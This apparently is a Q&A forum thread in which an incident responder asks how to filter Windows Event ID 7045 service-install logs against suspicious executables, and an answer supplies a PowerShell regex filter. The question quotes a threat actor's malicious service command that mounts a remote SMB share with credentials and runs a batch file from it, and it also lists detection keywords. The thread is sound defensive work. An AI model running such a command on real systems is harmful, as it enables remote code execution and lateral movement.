0

Thank you for all the help I've gotten so far, much appreciated. I have been trying to achieve a simple task: to compare "Image Path" of a Event ID 7045 with a set of pre-defined keywords. The Like isn't working and Compare looks for an exact match.

$sus = @('powershell.exe','cmd.exe','psexesvc.exe')
$7045 = Get-WinEvent -FilterHashtable @{ Path="System.evtx"; Id = 7045 } | select 
@{N=’Timestamp’;E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}},
Id, 
@{N=’Machine Name’;E={$_.MachineName}},
@{N=’Service Name’; 
E={$_.Properties[0].Value}},
@{N=’Image Path’; E={$_.Properties[1].Value}},@{N=’RunAsUser’; E={$_.Properties[4].Value}},
@{N=’Installed By’; E={$_.UserId}} | where 'Image Path' -match $sus```

I mean, if any of the keywords hit a match, I'd be interested!

To give you an idea, one of the many many malicious services installed by a Threat Actor looked like,

``cmd.exe /c powershell -c "net use \\192.168.100.100 /user:workgroup\test p@ssw0rd123;cmd.exe /c \\192.168.100.100\OutPut\run.bat"

So I kinda have many examples but .. if there was a way to get the Like operator work here, fantastic!

Thank you :)

Improve this question

1 Answer 1

Reset to default
2

You can use regex -match instead of like. For that, you need to create a regex string from the executables, combining the names with regex 'OR' (|) and escape the dot with a backslash:

# create a regex for the suspicious executables:
$sus = '(powershell|cmd|psexesvc)\.exe'
# alternatively you can join the array items like this:
# $sus = ('powershell.exe','cmd.exe','psexesvc.exe' | ForEach-Object {[regex]::Escape($_)}) -join '|'

$7045 = Get-WinEvent -FilterHashtable @{ LogName = 'System';Id = 7045 } | 
        Where-Object { $_.Properties[1].Value -match $sus } |
        Select-Object Id, 
                      @{N='Timestamp';E={$_.TimeCreated.ToUniversalTime().ToString('yyyy-MM-ddTHH:mm:ssZ')}}, 
                      @{N='Machine Name';E={$_.MachineName}},
                      @{N='Service Name'; E={$_.Properties[0].Value}},
                      @{N='Image Path'; E={$_.Properties[1].Value}},
                      @{N='RunAsUser'; E={$_.Properties[4].Value}},
                      @{N='Installed By'; E={$_.UserId}}
Improve this answer
Sign up to request clarification or add additional context in comments.

Comments

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.